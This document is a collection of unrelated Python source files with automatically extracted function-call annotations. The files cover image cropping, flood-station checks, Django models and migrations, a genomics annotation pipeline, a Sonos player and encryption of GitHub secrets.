'from alembic import op\n'), ((1540, 1552), 'sqlalchemy.Boolean', 'sa.Boolean', ([], {}), '()\n', (1550, 1552), True, 'import sqlalchemy as sa\n')] |
import os
from PIL import Image
import time
in_dir = 'images_1000'
out_dir = 'images_crop'
if not os.path.isdir(out_dir):
os.mkdir(out_dir)
img_list = os.listdir(in_dir)
for img_file in img_list:
print(img_file)
img_name = os.path.splitext(os.path.basename(img_file))[0]
img = Image.open(os.path.join(in_dir, img_file))
img_size = img.size
crop_width = round(img_size[0]/4)
for ii in range(4):
x1 = crop_width * ii
y1 = 0
x2 = crop_width * (ii + 1)
y2 = img_size[1]
img_c = img.crop([x1, y1, x2, y2])
now = str(int(time.time()))
img_crop_name = os.path.join(out_dir, img_name + '_' + now +'_'+ str(ii) + '.png')
img_c.save(img_crop_name)
| [
"os.listdir",
"os.path.join",
"os.path.isdir",
"os.mkdir",
"os.path.basename",
"time.time"
] | [((158, 176), 'os.listdir', 'os.listdir', (['in_dir'], {}), '(in_dir)\n', (168, 176), False, 'import os\n'), ((100, 122), 'os.path.isdir', 'os.path.isdir', (['out_dir'], {}), '(out_dir)\n', (113, 122), False, 'import os\n'), ((128, 145), 'os.mkdir', 'os.mkdir', (['out_dir'], {}), '(out_dir)\n', (136, 145), False, 'import os\n'), ((307, 337), 'os.path.join', 'os.path.join', (['in_dir', 'img_file'], {}), '(in_dir, img_file)\n', (319, 337), False, 'import os\n'), ((255, 281), 'os.path.basename', 'os.path.basename', (['img_file'], {}), '(img_file)\n', (271, 281), False, 'import os\n'), ((595, 606), 'time.time', 'time.time', ([], {}), '()\n', (604, 606), False, 'import time\n')] |
from floodsystem.stationdata import build_station_list, update_water_levels
from floodsystem.flood import stations_levels_over_threshold
def run():
# Build list of stations
stations = build_station_list()
# Update latest level data for all stations
update_water_levels(stations)
# Check which stations have relative water levels above 0.8
tol = 0.8
stations_over_tol = stations_levels_over_threshold(stations, tol)
for station, level in stations_over_tol:
if level < 100:
print(station.name, level)
if __name__ == "__main__":
print("*** Task 2B: CUED Part IA Flood Warning System ***")
run()
| [
"floodsystem.stationdata.build_station_list",
"floodsystem.flood.stations_levels_over_threshold",
"floodsystem.stationdata.update_water_levels"
] | [((195, 215), 'floodsystem.stationdata.build_station_list', 'build_station_list', ([], {}), '()\n', (213, 215), False, 'from floodsystem.stationdata import build_station_list, update_water_levels\n'), ((269, 298), 'floodsystem.stationdata.update_water_levels', 'update_water_levels', (['stations'], {}), '(stations)\n', (288, 298), False, 'from floodsystem.stationdata import build_station_list, update_water_levels\n'), ((403, 448), 'floodsystem.flood.stations_levels_over_threshold', 'stations_levels_over_threshold', (['stations', 'tol'], {}), '(stations, tol)\n', (433, 448), False, 'from floodsystem.flood import stations_levels_over_threshold\n')] |
"""
Use a common library (skimage) as a source of truth for
experimental images to analyze
"""
import skimage
import pathlib
import numpy as np
import matplotlib.pyplot as plt
from PIL import Image
def saveImage(data: np.ndarray, name: str):
# save it to disk
repoRoot = pathlib.Path(__file__).parent.parent
dataFolder = repoRoot.joinpath("data/images")
if len(data.shape) == 2:
np.savetxt(dataFolder.joinpath(f"{name}.txt"), data, fmt="%d")
Image.fromarray(data).save(dataFolder.joinpath(f"{name}.png"))
# read it from disk and verify it matches
data2 = np.array(Image.open(dataFolder.joinpath(f"{name}.png")))
assert(data2.all() == data.all())
if __name__ == "__main__":
imageFuncs = [
"astronaut", "binary_blobs", "brick", "camera", "cat", "cell",
"checkerboard", "chelsea", "clock", "coffee", "coins",
"colorwheel", "grass", "gravel", "horse", "hubble_deep_field",
"immunohistochemistry", "logo", "microaneurysms",
"moon", "page", "retina", "rocket", "stereo_motorcycle",
]
for funcName in imageFuncs:
print(funcName)
func = getattr(skimage.data, funcName)
data = func()
saveImage(data, funcName)
| [
"PIL.Image.fromarray",
"pathlib.Path"
] | [((283, 305), 'pathlib.Path', 'pathlib.Path', (['__file__'], {}), '(__file__)\n', (295, 305), False, 'import pathlib\n'), ((474, 495), 'PIL.Image.fromarray', 'Image.fromarray', (['data'], {}), '(data)\n', (489, 495), False, 'from PIL import Image\n')] |
import torch
def cross_entropy_loss():
return torch.nn.CrossEntropyLoss(reduction="mean")
| [
"torch.nn.CrossEntropyLoss"
] | [((52, 95), 'torch.nn.CrossEntropyLoss', 'torch.nn.CrossEntropyLoss', ([], {'reduction': '"""mean"""'}), "(reduction='mean')\n", (77, 95), False, 'import torch\n')] |
"""
Tests for HAProxyMonitor
run with nosetests
"""
__copyright__ = '2013, Room 77, Inc.'
__author__ = '<NAME> <<EMAIL>>'
from flexmock import flexmock
import unittest
from pylib.monitor.haproxy.haproxy_cluster_monitor_group import HAProxyClusterMonitorGroup
def mock_monitor(url, available):
"""
Create a mock HAProxyMonitor
Args:
url (string): url of haproxy stats page for this monitor
available (bool): whether this monitor is reachable
"""
mock_monitor = flexmock(url=url)
if available:
mock_monitor.should_receive('check').and_return(True)
else:
mock_monitor.should_receive('check').and_raise(IOError)
return mock_monitor
class TestHAProxyClusterMonitorGroup(unittest.TestCase):
def test_check(self):
cluster_monitors = {'cluster1': [mock_monitor(
'http://cluster1.room77.com/mock_haproxy', avail) for avail in
[True, True, True, True]],
'cluster2': [mock_monitor(
'http://cluster2.room77.com/mock_haproxy', avail) for avail in
[False, True, True, True]],
'cluster3': [mock_monitor(
'http://cluster3.room77.com/mock_haproxy', avail) for avail in
[True, False, False, False]],
'cluster4': [mock_monitor(
'http://cluster3.room77.com/mock_haproxy', avail) for avail in
[False, True, True, False]]}
monitor_group = HAProxyClusterMonitorGroup('<EMAIL>',
cluster_monitors)
# mock is_active so we don't read clusters conf
(flexmock(monitor_group)
.should_receive('is_active')
.and_return(True))
# expect one email to be sent in cluster 4
(flexmock(monitor_group)
.should_receive('send_email')
.and_return(True)
.once())
monitor_group.check()
| [
"pylib.monitor.haproxy.haproxy_cluster_monitor_group.HAProxyClusterMonitorGroup",
"flexmock.flexmock"
] | [((484, 501), 'flexmock.flexmock', 'flexmock', ([], {'url': 'url'}), '(url=url)\n', (492, 501), False, 'from flexmock import flexmock\n'), ((1511, 1566), 'pylib.monitor.haproxy.haproxy_cluster_monitor_group.HAProxyClusterMonitorGroup', 'HAProxyClusterMonitorGroup', (['"""<EMAIL>"""', 'cluster_monitors'], {}), "('<EMAIL>', cluster_monitors)\n", (1537, 1566), False, 'from pylib.monitor.haproxy.haproxy_cluster_monitor_group import HAProxyClusterMonitorGroup\n'), ((1672, 1695), 'flexmock.flexmock', 'flexmock', (['monitor_group'], {}), '(monitor_group)\n', (1680, 1695), False, 'from flexmock import flexmock\n'), ((1807, 1830), 'flexmock.flexmock', 'flexmock', (['monitor_group'], {}), '(monitor_group)\n', (1815, 1830), False, 'from flexmock import flexmock\n')] |
# For compatibility with Python2
from __future__ import print_function, division, absolute_import
#
import spekpy as sp
print("\n** Script to save, load and remove a new spectrum from disk **\n")
# Generate filtered spectrum
s=sp.Spek(kvp=120,th=12).filter('Al',2.5)
# Print summary of metrics
s.summarize(mode="full")
# Save spectrum as new state
state_name='My spectrum state'
s.save_state(state_name)
# See all user-saved states
sp.Spek.show_states(state_dir="usr")
# Load the new saved state
t=sp.Spek.load_state(state_name)
# Print summary of metrics (should be the same as above)
t.summarize(mode="full")
# Remove/delete te state
sp.Spek.remove_state('My spectrum state')
# See all user-saved states (new state should now have been removed)
sp.Spek.show_states(state_dir="usr")
| [
"spekpy.Spek",
"spekpy.Spek.show_states",
"spekpy.Spek.load_state",
"spekpy.Spek.remove_state"
] | [((434, 470), 'spekpy.Spek.show_states', 'sp.Spek.show_states', ([], {'state_dir': '"""usr"""'}), "(state_dir='usr')\n", (453, 470), True, 'import spekpy as sp\n'), ((500, 530), 'spekpy.Spek.load_state', 'sp.Spek.load_state', (['state_name'], {}), '(state_name)\n', (518, 530), True, 'import spekpy as sp\n'), ((638, 679), 'spekpy.Spek.remove_state', 'sp.Spek.remove_state', (['"""My spectrum state"""'], {}), "('My spectrum state')\n", (658, 679), True, 'import spekpy as sp\n'), ((749, 785), 'spekpy.Spek.show_states', 'sp.Spek.show_states', ([], {'state_dir': '"""usr"""'}), "(state_dir='usr')\n", (768, 785), True, 'import spekpy as sp\n'), ((229, 252), 'spekpy.Spek', 'sp.Spek', ([], {'kvp': '(120)', 'th': '(12)'}), '(kvp=120, th=12)\n', (236, 252), True, 'import spekpy as sp\n')] |
#!/usr/bin/env python
import os
import time
import datetime
from soco import SoCo
from threading import Thread
from SocketServer import TCPServer
from __future__ import print_function
from SimpleHTTPServer import SimpleHTTPRequestHandler
# Athan files names - mp3 files should be placed in the same folder as script
REG_ATAHN = '1016.mp3'
FAJR_ATHAN = '168410.mp3'
PORT = 8000 # Port number for web server
MY_IP = '192.168.1.10' # IP of the Raspberry Pi
SPEAKER_IP = '192.168.1.11' # IP of the Sonos speaker
class HttpServer(Thread):
def __init__(self, port):
super(HttpServer, self).__init__()
self.daemon = True
handler = SimpleHTTPRequestHandler
self.httpd = TCPServer(('', port), handler)
def run(self):
print("Starting http server")
self.httpd.serve_forever()
def stop(self):
print("Stopping http server")
self.httpd.socket.close()
def play_athan(sonos, file):
netpath = 'http://{}:{}/rpi_athan/{}'.format(MY_IP, PORT, file)
sonos.volume = 50
sonos.play_uri(netpath)
def main():
sonos = SoCo(SPEAKER_IP)
server = HttpServer(port)
isFajr = datetime.datetime.now().hour < 7
athan_file = FAJR_ATHAN if isFajr else REG_ATAHN
current_track = sonos.get_current_track_info()
if current_track:
print("Found {} playing...".format(current_track['title']))
seek_time = current_track['position']
prev_volume = sonos.volume
playlist_pos = int(current_track['playlist_position'])
server.start()
play_athan(sonos, athan_file)
# Sleep for the amount of time it takes the athan to play
time.sleep(245 if isFajr else 190)
if current_track:
print("Returning to {}...".format(current_track['title']))
sonos.volume = prev_volume
sonos.play_from_queue(playlist_pos)
sonos.seek(seek_time)
server.stop()
main()
| [
"SocketServer.TCPServer",
"datetime.datetime.now",
"soco.SoCo",
"time.sleep"
] | [((1044, 1060), 'soco.SoCo', 'SoCo', (['SPEAKER_IP'], {}), '(SPEAKER_IP)\n', (1048, 1060), False, 'from soco import SoCo\n'), ((1556, 1590), 'time.sleep', 'time.sleep', (['(245 if isFajr else 190)'], {}), '(245 if isFajr else 190)\n', (1566, 1590), False, 'import time\n'), ((689, 719), 'SocketServer.TCPServer', 'TCPServer', (["('', port)", 'handler'], {}), "(('', port), handler)\n", (698, 719), False, 'from SocketServer import TCPServer\n'), ((1098, 1121), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (1119, 1121), False, 'import datetime\n')] |
# Generated by Django 3.0.3 on 2020-06-12 04:39
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('rent', '0006_rentorder_pay'),
]
operations = [
migrations.AddField(
model_name='rentorder',
name='money',
field=models.IntegerField(default=0, verbose_name='金额'),
),
]
| [
"django.db.models.IntegerField"
] | [((328, 377), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)', 'verbose_name': '"""金额"""'}), "(default=0, verbose_name='金额')\n", (347, 377), False, 'from django.db import migrations, models\n')] |
#### Usage: python3 this.py <VDJ.bed> <D.fa> <scripts_dir> <input.tlx> <output_prefix>
#### 2020-02-11, we think the default score threshold = 5 of D annotation in VDJ recombination (yyx_annotate_tlx_midD_LCS.20190116.py) may be too stringent.
#### We decide to change it to 3, and then implement another script to iteratively calculate D usage in VDJ
import sys, os, os.path, subprocess, time
### flushing print, reference: https://mail.python.org/pipermail/python-list/2015-November/698426.html
def _print(*args, **kwargs):
file = kwargs.get('file', sys.stdout)
print(*args, **kwargs)
file.flush()
### reference: Yyx_system_command_functions.20160607.pl, tlx2bed_v3.py
start_time = time.time()
_print('[PYTHON-START] ' + time.ctime(), file=sys.stderr)
def check_elapsed_time(start_time):
end_time = time.time()
elapsed_time = end_time - start_time
day = int(elapsed_time / (3600*24))
hour = int(elapsed_time % (3600*24) / 3600)
min = int(elapsed_time % 3600 / 60)
sec = elapsed_time % 60
elapsed_time = ''
if day>0 : elapsed_time += '{}day '.format(day)
if hour>0: elapsed_time += '{}h'.format(hour)
if min>0 : elapsed_time += '{}min'.format(min)
if sec>0 or elapsed_time == '': elapsed_time += '{:.2f}s'.format(sec)
_print('[PYTHON-TIME] ' + elapsed_time, file=sys.stderr)
def check_is_empty_dir(dirname):
if os.path.isdir(dirname):
for nowDirName, subdirList, fileList in os.walk(dirname):
if nowDirName == '.':
return len(subfileList) == 0
else:
continue
else:
_print('Warning: Not a dir is attemped to be checked', file=sys.stderr)
return None
def exist_file_or_dir(filenames, prompt_str, mode='any'):
if mode not in ('any', 'all'):
_print('Error: mode should be either "any" or "all", in exist_file_or_dir()', file=sys.stderr)
return None
is_mode_all = False
if mode == 'any':
is_mode_all = True
if isinstance(filenames, str):
filenames = [filenames]
not_None_count = 0
for filename in filenames:
if filename is None:
continue
not_None_count += 1
if os.path.isdir(filename):
if not check_is_empty_dir(filename):
_print('[CHECK-EXIST] Dir ' + filename + ' has already existed, and not empty. ' + prompt_str, file=sys.stderr)
if not is_mode_all:
return True
else:
if is_mode_all:
return False
elif os.path.isfile(filename) and os.path.getsize(filename) >= 100:
# os.path.getsize(x) may also be os.stat(x).st_size
_print('[CHECK-EXIST] File ' + filename + ' has already existed. ' + prompt_str, file=sys.stderr)
if not is_mode_all:
return True
else:
if is_mode_all:
return False
if not_None_count > 0:
return is_mode_all
return False
def check_final_file_then_remove_intermediate_file(final_filenames, intermediate_filenames, mode='all'):
if mode not in ('any', 'all'):
_print('Error: mode should be either "any" or "all", in check_final_file_then_remove_intermediate_file()', file=sys.stderr)
return
if isinstance(intermediate_filenames, str):
intermediate_filenames = [intermediate_filenames]
if exist_file_or_dir(final_filenames, 'So remove intermediate files...', mode=mode):
for filename in intermediate_filenames:
if filename is None:
continue
if os.path.exists(filename):
_print('[PYTHON-REMOVE] ' + filename, file=sys.stderr)
os.remove(filename)
def check_file_then_exec_command(filenames, command, should_time=False, error_stop=False, not_run=False):
start_time = time.time()
_print('[SUBPROCESS-CALL] ' + command, file=sys.stderr)
if exist_file_or_dir(filenames, 'Skip this above command...', mode='any'):
return
if not not_run:
# returnValue = os.system('/bin/bash -c ' + command)
returnValue = subprocess.call(['/bin/bash', '-c', command])
if returnValue != 0:
if error_stop:
_print('Error: when exec last command, return value = {}'.format(returnValue), file=sys.stderr)
sys.exit(returnValue)
if should_time:
check_elapsed_time(start_time)
def stop_if_file_not_exist(filenames, mode='any'):
if mode not in ('any', 'all'):
_print('Error: mode should be either "any" or "all", in stop_if_file_not_exist()', file=sys.stderr)
return None
is_mode_all = False
if mode == 'all':
is_mode_all = True
if isinstance(filenames, str):
filenames = [filenames]
checkFileNumber = 0
missingFileNumber = 0
for filename in filenames:
if filename is None:
continue
checkFileNumber += 1
if not os.path.isfile(filename):
# os.path.getsize(x) may also be os.stat(x).st_size
_print('[CHECK-EXIST] File ' + filename + ' does not exist.', file=sys.stderr)
missingFileNumber += 1
else:
_print('[CHECK-EXIST] File ' + filename + ' exists. Good.', file=sys.stderr)
if missingFileNumber > 0:
if not is_mode_all:
_print('[STOP-NOT-EXIST] Error: requested {} file(s) is missing. Terminate!'.format(missingFileNumber), file=sys.stderr)
sys.exit(missingFileNumber)
elif missingFileNumber == checkFileNumber:
_print('[STOP-NOT-EXIST] Error: requested file(s) is missing. Terminate!', file=sys.stderr)
sys.exit(missingFileNumber)
#import string
#def generateRandomString(length, charSet=string.ascii_uppercase+string.ascii_lowercase):
# return ''.join(random.choice(charSet) for _ in range(length))
def list_assign(inputList, idx, value):
while len(inputList) <= idx:
inputList.append(None)
inputList[idx] = value
return inputList
bed_filename, D_ref_filename, scripts_root_dirname, input_tlx_filename, output_prefix = sys.argv[1:]
date_postfix = time.strftime('%Y%m%d')
### reference: work_flow.annotate_GSE82126_tlx.20190116.sh, work_flow.annotate_Alt225_tlx.20190116.sh
output_filenames = []
parts = ('junction', 'prey', 'bait')
is_tlx_gzipped = False
if input_tlx_filename.endswith('.gz'):
is_tlx_gzipped = True
list_assign(output_filenames, 4, '{}.sequence_segmented.{}.tlx'.format(output_prefix, date_postfix))
list_assign(output_filenames, 6, '{}.intersectBed_annotated.{}.tlx'.format(output_prefix, date_postfix))
list_assign(output_filenames, 8, '{}.annotate_tlx_midD_LCS.{}.tlx'.format(output_prefix, date_postfix) )
list_assign(output_filenames, 10, '{}.HTGTS_annotate_merged.{}'.format(output_prefix, date_postfix) )
list_assign(output_filenames, 11, output_filenames[10] + '.tsv' )
list_assign(output_filenames, 12, output_filenames[10] + '.log' )
list_assign(output_filenames, 15, '{}.HTGTS_VDJ_annotated.{}.tsv'.format(output_prefix, date_postfix) )
#used_scripts_filenames = [
# 'yyx_tlx2bed.20181223.py', 'yyx_sequence_segment_tlx.20181221.py', 'yyx_annotate_tlx_with_intersectBedResults.20181223.py',
# 'yyx_annotate_tlx_midD_LCS.20190116.py', 'yyx_uniq_count_and_merge.20190111.py'
# ]
if not exist_file_or_dir(output_filenames[15], 'So skip all HTGTS annotation part...', mode='any'):
stop_if_file_not_exist(input_tlx_filename)
stop_if_file_not_exist('{}/Yyx_check_col_num.pl'.format(scripts_root_dirname))
command = '{}/Yyx_check_col_num.pl '.format(scripts_root_dirname) + input_tlx_filename
if is_tlx_gzipped:
command = '{}/Yyx_check_col_num.pl <(zcat {} | head -n2)'.format(scripts_root_dirname, input_tlx_filename)
_print('[SUBPROCESS-CHECK-OUTPUT] ' + command, file=sys.stderr)
outBytes = subprocess.check_output(['/bin/bash', '-c', command])
outStr = outBytes.decode('utf-8')
# _print('[DEBUG] ' + outStr, file=sys.stderr)
headline_colnum_str = outStr.split('\n')[1]
_print(' Original column number = ' + headline_colnum_str, file=sys.stderr)
original_colnum = int(headline_colnum_str)
if not exist_file_or_dir(output_filenames[6], 'So skip intersectBed part...', mode='any'):
stop_if_file_not_exist('{}/yyx_tlx2bed.20200126.py'.format(scripts_root_dirname))
for i in range(len(parts)):
part = parts[i]
tmp_bed_filename = '{}.{}.{}.tmp.bed'.format(output_prefix, part, date_postfix)
out_bed_filename = '{}.{}.{}.bed'.format(output_prefix, part, date_postfix)
list_assign(output_filenames, i, out_bed_filename)
command = ('z' if is_tlx_gzipped else '') + 'cat "' + input_tlx_filename + '" | python3 {}/yyx_tlx2bed.20181223.py '.format(scripts_root_dirname) + part + ' >' + tmp_bed_filename
check_file_then_exec_command(tmp_bed_filename, command, should_time=True)
command = 'bedtools intersect -a ' + tmp_bed_filename + ' -b ' + bed_filename + ' -wao >' + out_bed_filename
check_file_then_exec_command(out_bed_filename, command, should_time=True)
check_final_file_then_remove_intermediate_file(out_bed_filename, tmp_bed_filename)
stop_if_file_not_exist('{}/yyx_sequence_segment_tlx.20181221.py'.format(scripts_root_dirname))
# list_assign(output_filenames, 4, '{}.sequence_segmented.{}.tlx'.format(output_prefix, date_postfix))
command = ('z' if is_tlx_gzipped else '') + 'cat "' + input_tlx_filename + '" | python3 {}/yyx_sequence_segment_tlx.20181221.py >{}'.format(scripts_root_dirname, output_filenames[4])
check_file_then_exec_command(output_filenames[4], command, should_time=True)
stop_if_file_not_exist('{}/yyx_annotate_tlx_with_intersectBedResults.20181223.py'.format(scripts_root_dirname))
# list_assign(output_filenames, 6, '{}.intersectBed_annotated.{}.tlx'.format(output_prefix, date_postfix))
command = 'python3 {}/yyx_annotate_tlx_with_intersectBedResults.20181223.py {} {} {} {}'.format(scripts_root_dirname, output_filenames[4], output_filenames[0], output_filenames[1], output_filenames[2]) + " | perl -pe 'BEGIN{$r=-1;} $r++; if($r==0){ s/anno1/junction/g; s/anno2/prey/g; s/anno3/bait/g; }' >" + output_filenames[6]
check_file_then_exec_command(output_filenames[6], command, should_time=True)
check_final_file_then_remove_intermediate_file(output_filenames[6], output_filenames[0:5])
if not exist_file_or_dir(output_filenames[8], 'So skip miD_LCS part...', mode='any'):
stop_if_file_not_exist('{}/yyx_annotate_tlx_midD_LCS.20190116.py'.format(scripts_root_dirname))
# list_assign(output_filenames, 8, '{}.annotate_tlx_midD_LCS.{}.tlx'.format(output_prefix, date_postfix) )
command = ('z' if is_tlx_gzipped else '') + 'cat "' + input_tlx_filename + '" | python3 {}/yyx_annotate_tlx_midD_LCS.20190116.py {} {} >{}'.format(scripts_root_dirname, D_ref_filename, 3, output_filenames[8])
check_file_then_exec_command(output_filenames[8], command, should_time=True)
stop_if_file_not_exist('{}/yyx_uniq_count_and_merge.20190111.py'.format(scripts_root_dirname))
# list_assign(output_filenames, 10, '{}.HTGTS_annotate_merged.{}'.format(output_prefix, date_postfix) )
# list_assign(output_filenames, 11, output_filenames[10] + '.tsv' )
# list_assign(output_filenames, 12, output_filenames[10] + '.log' )
command = 'python3 {}/yyx_uniq_count_and_merge.20190111.py - 0 {} {}:1-{} {}:1-{}'.format(scripts_root_dirname, output_filenames[10], output_filenames[6], original_colnum+5, output_filenames[8], original_colnum+5)
check_file_then_exec_command(output_filenames[11], command, should_time=True)
stop_if_file_not_exist('{}/yyx_show_or_skip_or_retrieve_columns.20190128.py'.format(scripts_root_dirname))
# list_assign(output_filenames, 15, '{}.HTGTS_VDJ_annotate.{}.tsv'.format(output_prefix, date_postfix) )
command = 'cat {} | python3 {}/yyx_show_or_skip_or_retrieve_columns.20190128.py skip '.format(output_filenames[11], scripts_root_dirname) + "'^count_in_file_.*'" + ' >' + output_filenames[15]
check_file_then_exec_command(output_filenames[15], command, should_time=True)
check_final_file_then_remove_intermediate_file(output_filenames[15], output_filenames[9:15])
_print('[PYTHON-END] ' + time.ctime(), file=sys.stderr)
check_elapsed_time(start_time)
| [
"subprocess.check_output",
"os.path.exists",
"time.ctime",
"os.path.getsize",
"time.strftime",
"os.path.isfile",
"os.path.isdir",
"subprocess.call",
"sys.exit",
"time.time",
"os.walk",
"os.remove"
] | [((698, 709), 'time.time', 'time.time', ([], {}), '()\n', (707, 709), False, 'import sys, os, os.path, subprocess, time\n'), ((5518, 5541), 'time.strftime', 'time.strftime', (['"""%Y%m%d"""'], {}), "('%Y%m%d')\n", (5531, 5541), False, 'import sys, os, os.path, subprocess, time\n'), ((818, 829), 'time.time', 'time.time', ([], {}), '()\n', (827, 829), False, 'import sys, os, os.path, subprocess, time\n'), ((1343, 1365), 'os.path.isdir', 'os.path.isdir', (['dirname'], {}), '(dirname)\n', (1356, 1365), False, 'import sys, os, os.path, subprocess, time\n'), ((3452, 3463), 'time.time', 'time.time', ([], {}), '()\n', (3461, 3463), False, 'import sys, os, os.path, subprocess, time\n'), ((7203, 7256), 'subprocess.check_output', 'subprocess.check_output', (["['/bin/bash', '-c', command]"], {}), "(['/bin/bash', '-c', command])\n", (7226, 7256), False, 'import sys, os, os.path, subprocess, time\n'), ((737, 749), 'time.ctime', 'time.ctime', ([], {}), '()\n', (747, 749), False, 'import sys, os, os.path, subprocess, time\n'), ((1409, 1425), 'os.walk', 'os.walk', (['dirname'], {}), '(dirname)\n', (1416, 1425), False, 'import sys, os, os.path, subprocess, time\n'), ((2039, 2062), 'os.path.isdir', 'os.path.isdir', (['filename'], {}), '(filename)\n', (2052, 2062), False, 'import sys, os, os.path, subprocess, time\n'), ((3697, 3742), 'subprocess.call', 'subprocess.call', (["['/bin/bash', '-c', command]"], {}), "(['/bin/bash', '-c', command])\n", (3712, 3742), False, 'import sys, os, os.path, subprocess, time\n'), ((11497, 11509), 'time.ctime', 'time.ctime', ([], {}), '()\n', (11507, 11509), False, 'import sys, os, os.path, subprocess, time\n'), ((3222, 3246), 'os.path.exists', 'os.path.exists', (['filename'], {}), '(filename)\n', (3236, 3246), False, 'import sys, os, os.path, subprocess, time\n'), ((4424, 4448), 'os.path.isfile', 'os.path.isfile', (['filename'], {}), '(filename)\n', (4438, 4448), False, 'import sys, os, os.path, subprocess, time\n'), ((4878, 4905), 'sys.exit', 'sys.exit', (['missingFileNumber'], {}), '(missingFileNumber)\n', (4886, 4905), False, 'import sys, os, os.path, subprocess, time\n'), ((2315, 2339), 'os.path.isfile', 'os.path.isfile', (['filename'], {}), '(filename)\n', (2329, 2339), False, 'import sys, os, os.path, subprocess, time\n'), ((3311, 3330), 'os.remove', 'os.remove', (['filename'], {}), '(filename)\n', (3320, 3330), False, 'import sys, os, os.path, subprocess, time\n'), ((3888, 3909), 'sys.exit', 'sys.exit', (['returnValue'], {}), '(returnValue)\n', (3896, 3909), False, 'import sys, os, os.path, subprocess, time\n'), ((5049, 5076), 'sys.exit', 'sys.exit', (['missingFileNumber'], {}), '(missingFileNumber)\n', (5057, 5076), False, 'import sys, os, os.path, subprocess, time\n'), ((2344, 2369), 'os.path.getsize', 'os.path.getsize', (['filename'], {}), '(filename)\n', (2359, 2369), False, 'import sys, os, os.path, subprocess, time\n')] |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import django.core.validators
class Migration(migrations.Migration):
dependencies = [
('cms', '0016_auto_20160608_1535'),
('copilot', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='EventList',
fields=[
('cmsplugin_ptr', models.OneToOneField(parent_link=True, primary_key=True, auto_created=True, serialize=False, related_name='copilot_eventlist', to='cms.CMSPlugin')),
('artist_id', models.UUIDField(null=True, verbose_name='artist id', blank=True)),
('event_count', models.PositiveIntegerField(help_text='The maximum number of events to show.', verbose_name='number of events', default=5, validators=[django.core.validators.MinValueValidator(1)])),
],
options={
'abstract': False,
},
bases=('cms.cmsplugin',),
),
migrations.AlterField(
model_name='news',
name='cmsplugin_ptr',
field=models.OneToOneField(parent_link=True, primary_key=True, auto_created=True, serialize=False, related_name='copilot_news', to='cms.CMSPlugin'),
),
]
| [
"django.db.models.OneToOneField",
"django.db.models.UUIDField"
] | [((1135, 1280), 'django.db.models.OneToOneField', 'models.OneToOneField', ([], {'parent_link': '(True)', 'primary_key': '(True)', 'auto_created': '(True)', 'serialize': '(False)', 'related_name': '"""copilot_news"""', 'to': '"""cms.CMSPlugin"""'}), "(parent_link=True, primary_key=True, auto_created=True,\n serialize=False, related_name='copilot_news', to='cms.CMSPlugin')\n", (1155, 1280), False, 'from django.db import migrations, models\n'), ((423, 573), 'django.db.models.OneToOneField', 'models.OneToOneField', ([], {'parent_link': '(True)', 'primary_key': '(True)', 'auto_created': '(True)', 'serialize': '(False)', 'related_name': '"""copilot_eventlist"""', 'to': '"""cms.CMSPlugin"""'}), "(parent_link=True, primary_key=True, auto_created=True,\n serialize=False, related_name='copilot_eventlist', to='cms.CMSPlugin')\n", (443, 573), False, 'from django.db import migrations, models\n'), ((602, 667), 'django.db.models.UUIDField', 'models.UUIDField', ([], {'null': '(True)', 'verbose_name': '"""artist id"""', 'blank': '(True)'}), "(null=True, verbose_name='artist id', blank=True)\n", (618, 667), False, 'from django.db import migrations, models\n')] |
"""
Full Text Search Framework
"""
from django.db import models
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes import generic
from fts.settings import *
if FTS_BACKEND.startswith('simple://'):
class IndexWord(models.Model):
word = models.CharField(unique=True, db_index=True, blank=False, max_length=100)
def __unicode__(self):
return u"%s" % (self.word)
class Index(models.Model):
word = models.ForeignKey(IndexWord)
weight = models.IntegerField()
content_type = models.ForeignKey(ContentType)
object_id = models.PositiveIntegerField()
content_object = generic.GenericForeignKey('content_type', 'object_id')
def __unicode__(self):
return u'%s [%s]' % (self.content_object, self.word.word)
| [
"django.db.models.IntegerField",
"django.contrib.contenttypes.generic.GenericForeignKey",
"django.db.models.ForeignKey",
"django.db.models.PositiveIntegerField",
"django.db.models.CharField"
] | [((299, 372), 'django.db.models.CharField', 'models.CharField', ([], {'unique': '(True)', 'db_index': '(True)', 'blank': '(False)', 'max_length': '(100)'}), '(unique=True, db_index=True, blank=False, max_length=100)\n', (315, 372), False, 'from django.db import models\n'), ((509, 537), 'django.db.models.ForeignKey', 'models.ForeignKey', (['IndexWord'], {}), '(IndexWord)\n', (526, 537), False, 'from django.db import models\n'), ((556, 577), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (575, 577), False, 'from django.db import models\n'), ((612, 642), 'django.db.models.ForeignKey', 'models.ForeignKey', (['ContentType'], {}), '(ContentType)\n', (629, 642), False, 'from django.db import models\n'), ((664, 693), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', ([], {}), '()\n', (691, 693), False, 'from django.db import models\n'), ((720, 774), 'django.contrib.contenttypes.generic.GenericForeignKey', 'generic.GenericForeignKey', (['"""content_type"""', '"""object_id"""'], {}), "('content_type', 'object_id')\n", (745, 774), False, 'from django.contrib.contenttypes import generic\n')] |
# Copyright 2021 METRO Digital GmbH
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from base64 import b64encode
from nacl import encoding, public
import argparse
def encrypt(public_key: str, secret_value: str) -> str:
"""Encrypt a string using a given public key"""
public_key = public.PublicKey(public_key.encode("utf-8"), encoding.Base64Encoder())
sealed_box = public.SealedBox(public_key)
encrypted = sealed_box.encrypt(secret_value.encode("utf-8"))
return b64encode(encrypted).decode("utf-8")
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--key', dest="public_key", help="The public key recieved from GitHub API", type=str)
parser.add_argument('--value', dest="secret_value", help="The value to encrypt", type=str)
args = parser.parse_args()
# emcrypt secret value
print(encrypt(args.public_key, args.secret_value))
if __name__ == "__main__":
main() | [
"nacl.public.SealedBox",
"base64.b64encode",
"nacl.encoding.Base64Encoder",
"argparse.ArgumentParser"
